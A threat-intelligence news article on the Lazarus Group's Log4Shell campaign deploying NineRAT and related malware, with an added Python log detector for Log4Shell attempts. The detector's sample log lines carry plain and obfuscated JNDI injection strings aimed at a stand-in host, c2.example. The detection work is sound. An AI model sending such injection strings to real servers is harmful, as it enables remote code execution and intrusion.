Lazarus Group Uses Log4j Exploits to Deploy Remote Access Trojans

In a new global campaign, the infamous North Korea-linked threat group known as the Lazarus Group is behind Operation Blacksmith. In this operation, the group opportunistically exploits vulnerabilities in Log4j to deploy previously undocumented Remote Access Trojans (RATs) on compromised systems.

The activity, tracked by Cisco Talos, reveals the use of three DLang-based malware families, highlighting a RAT called NineRAT that uses Telegram for command and control (C2), along with DLRAT and a downloader called BottomLoader.

The Lazarus Group’s recent tactics overlap with the group known as Andariel, a subgroup within Lazarus, which is generally tasked with initial access, reconnaissance, and establishing long-term access for espionage in support of North Korea’s national interests.

The attack chain involves exploiting the CVE-2021-44228 (Log4Shell) vulnerability in publicly accessible VMware Horizon servers to deliver NineRAT. Notable sectors affected include manufacturing, agriculture and physical security.
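Log4Shell exploitation of an internet-facing Horizon server leaves the JNDI lookup string in web server logs, often hidden behind nested Log4j lookups or URL encoding. The following detector is an added example, not code from Cisco Talos or this article; the log lines, hosts and RFC 5737 addresses are constructed, and it assumes common access-log formatting with the source IP as the first field.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical hosts and RFC 5737 test
# addresses, not indicators from the article). Line 0 is benign.
SAMPLE_LOGS = [
    '203.0.113.5 - - [11/Dec/2023:10:01:02 +0000] "GET /portal/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2023:10:01:05 +0000] "GET / HTTP/1.1" 200 88 "-" "${jndi:ldap://c2.example/a}"',
    '203.0.113.9 - - [11/Dec/2023:10:01:09 +0000] "GET / HTTP/1.1" 200 88 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://c2.example/b}"',
    '203.0.113.9 - - [11/Dec/2023:10:01:12 +0000] "GET / HTTP/1.1" 200 88 "-" "${${env:NaN:-j}ndi:rmi://c2.example/c}"',
    '203.0.113.4 - - [11/Dec/2023:10:01:20 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fc2.example%2Fd%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
]

# Innermost obfuscation lookups that Log4j 2 resolves before the jndi lookup runs:
#   ${lower:x} / ${upper:x}   -> x (case-changed)
#   ${anything:-x}, ${::-x}   -> x (default-value syntax)
_OBFUSCATION = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # group 1: case-change lookup
    r"|\$\{[^${}]*?:-([^${}]*)\}",          # group 2: default-value lookup
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")   # group 1: protocol scheme (ldap, rmi, dns, ...)


def normalize(text: str) -> str:
    """URL-decode, then collapse nested obfuscation lookups until a fixed point."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _OBFUSCATION.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text.lower()


def find_log4shell_attempts(lines):
    """Return (line_index, source_ip, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((i, line.split(" ", 1)[0], m.group(1)))
    return hits


if __name__ == "__main__":
    for idx, src, scheme in find_log4shell_attempts(SAMPLE_LOGS):
        print(f"line {idx}: {src} attempted ${{jndi:{scheme}:...}} lookup")
```

A hit only shows an attempt; whether the server was vulnerable is confirmed by the outbound LDAP/RMI/DNS connection from the Horizon host, which is the stronger signal to alert on.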

NineRAT, developed around May 2022, has been used in attacks targeting a South American agricultural organization in March 2023 and a European manufacturing entity in September 2023. This RAT uses Telegram for C2 communications, seeking to evade detection.

Additionally, a custom proxy tool called HazyLoad, previously identified by Microsoft in intrusions exploiting CVE-2023-42793, is downloaded and executed by another malware called BottomLoader. Also seen is the delivery of DLRAT, which functions as both a downloader and a RAT, allowing system reconnaissance, deployment of additional malware, and retrieval of C2 commands for execution on compromised systems.

Deploying multiple redundant backdoors gives the Lazarus Group persistent access, allowing it to maintain control even if one tool is discovered. The continued use of Log4Shell is notable, as a significant percentage of applications still use vulnerable versions of the library.

This revelation comes as AhnLab's Security Emergency Response Center (ASEC) details Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT, distributed through spear-phishing attacks with deceptive attachments and links to evade detection by security products. Stay alert and up to date on the latest cyber threats to ensure the security of your systems.
